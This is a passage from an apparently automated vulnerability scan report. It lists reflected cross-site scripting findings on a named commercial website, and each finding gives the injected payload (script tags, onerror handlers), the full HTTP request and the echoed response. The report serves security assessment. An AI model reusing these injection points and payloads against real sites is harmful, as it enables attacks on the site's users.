Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7f7"><a>270de8f6e2c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search3f7f7"><a>270de8f6e2c&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search3f7f7"><a>270de8f6e2c&opt=1/more2.html" style="color: ">
...[SNIP]...

2.5243. http://www.resellerbase.com/web-service/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18ae"><img%20src%3da%20onerror%3dalert(1)>6b220ec79b6879ecd was submitted in the cat parameter. This input was echoed as a18ae\"><img src=a onerror=alert(1)>6b220ec79b6879ecd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php?cat=3a18ae"><img%20src%3da%20onerror%3dalert(1)>6b220ec79b6879ecd&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=3a18ae\"><img src=a onerror=alert(1)>6b220ec79b6879ecd">
...[SNIP]...

2.5244. http://www.resellerbase.com/web-service/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59532"><img%20src%3da%20onerror%3dalert(1)>4971c8571d1 was submitted in the cat parameter. This input was echoed as 59532\"><img src=a onerror=alert(1)>4971c8571d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/search.php?cat=359532"><img%20src%3da%20onerror%3dalert(1)>4971c8571d1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=359532\"><img src=a onerror=alert(1)>4971c8571d1">
...[SNIP]...

2.5245. http://www.resellerbase.com/web-service/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4ba1<a>47d472334ba was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?keyword=search...c4ba1<a>47d472334ba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...c4ba1<a>47d472334ba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5246. http://www.resellerbase.com/web-service/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279e3"><a>09c3c85f61d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...279e3"><a>09c3c85f61d&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...279e3"><a>09c3c85f61d&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.5247. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83444"><script>alert(1)</script>f153566998d30c4d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&/83444"><script>alert(1)</script>f153566998d30c4d0opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&/83444"><script>alert(1)</script>f153566998d30c4d0opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5248. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8839"><a>3d5c0bc141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/e8839"><a>3d5c0bc141252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
h.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/e8839"><a>3d5c0bc141252f/more2.html" style="color: ">
...[SNIP]...

2.5249. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ae4a<script>alert(1)</script>f8f0351079e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/search.php?keyword=search...&Submit3=Search&opt=2&5ae4a<script>alert(1)</script>f8f0351079e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Search&opt=2&5ae4a<script>alert(1)</script>f8f0351079e=1 was not found on this server.</p>
...[SNIP]...

2.5250. http://www.resellerbase.com/web-service/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc17e"><a>049a2d85bc5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1fc17e"><a>049a2d85bc5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1fc17e"><a>049a2d85bc5/more2.html" style="color: ">
...[SNIP]...

2.5251. http://www.resellerbase.com/web-service/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a8ab1<a>0b574347db0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?keyword=search...&Submit3=Search&opt=2a8ab1<a>0b574347db0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Search&opt=2a8ab1<a>0b574347db0 was not found on this server.</p>
...[SNIP]...

2.5252. http://www.resellerbase.com/web-service/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e197a"><a>042355fd855 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe197a"><a>042355fd855 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:54:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
hp?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe197a"><a>042355fd855/more2.html" style="color: ">
...[SNIP]...

2.5253. http://www.resellerbase.com/web-service/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c5e5"><script>alert(1)</script>bdca378e947 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1c5e5"><script>alert(1)</script>bdca378e947&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1c5e5"><script>alert(1)</script>bdca378e947&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com
...[SNIP]...

2.5254. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d797b<script>alert(1)</script>4b6f32cfc6eb27974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviced797b<script>alert(1)</script>4b6f32cfc6eb27974/software-scripts/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced797b<script>alert(1)</script>4b6f32cfc6eb27974/software-scripts/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5255. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43ea7<script>alert(1)</script>eefb4585f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service43ea7<script>alert(1)</script>eefb4585f53/software-scripts/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service43ea7<script>alert(1)</script>eefb4585f53/software-scripts/ was not found on this server.</p>
...[SNIP]...

2.5256. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3db2f<script>alert(1)</script>e4dec4598da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts3db2f<script>alert(1)</script>e4dec4598da/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts3db2f<script>alert(1)</script>e4dec4598da/ was not found on this server.</p>
...[SNIP]...

2.5257. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a829<script>alert(1)</script>3224a76d17d9474bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/software-scripts9a829<script>alert(1)</script>3224a76d17d9474bc/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts9a829<script>alert(1)</script>3224a76d17d9474bc/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

